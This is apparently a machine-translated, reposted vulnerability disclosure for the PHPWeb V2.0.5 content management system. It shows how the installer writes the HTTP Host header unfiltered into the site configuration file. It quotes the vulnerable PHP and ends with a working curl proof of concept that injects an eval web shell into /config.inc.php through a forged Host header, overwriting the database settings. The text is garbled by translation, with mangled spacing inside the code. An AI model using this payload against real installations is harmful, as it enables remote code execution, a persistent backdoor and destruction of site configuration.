Software Version: V2.0.5/20120412 commercial fee software Official Website: www.phpweb.net the reason is that the vulnerability uses the installation file to regenerate the configuration file and write executable code. 1: destructive actions: rewrite the configuration file database connection file. 2. webmasters with certain security knowledge will delete the install directory. Although it is a weakness, it also has advantages: not influenced by magic_quotes_gpc and webserver analysis: $ siteurl = "http ://". $ _ SERVER ["HTTP_HOST"]. "/"; // unfiltered $ filestr = fread (fopen ($ SysConfigFile, 'R'), 30000); $ filestr = str_replace ("","", $ filestr); $ filestr = str_replace ("DefaultDbHost", $ dbhost, $ filestr); $ filestr = str_replace ("DefaultDbName", $ dbname, $ filestr ); $ filestr = str_replace ("DefaultDbUser", $ dbuser, $ filestr); $ filestr = str_replace ("DefaultDbPass", $ dbpwd, $ filestr ); $ filestr = str_replace ("DefaultsLan", "zh_cn", $ filestr); $ filestr = str_replace ("DefaultTablePre", $ tablepre, $ filestr ); $ filestr = str_replace ("DefaultSiteUrl", $ siteurl, $ filestr); fwrite (fopen ($ ConFile, "w"), $ filestr, 30000 ); www.2cto.com $ _ SERVER ["HTTP_HOST"] is the control passed by the HOST in the http head, and is not affected by magic_quotes_gpc ^ _ ^ poc: curl http://192.168.1.105/code_test/phpweb/base/install/index.php -- Data "dbhost = localhost & dbname = phpweb & dbuser = root & dbpwd = root & tablepre = pwn & nextstep = 3 & command = gonext & alertmsg = & username =" -- header" HOST: localhost \ "; eval ($ _ REQUEST [a]); #" copy the code shell address:/config. inc. php, like the previous phpcms, requires remote databases.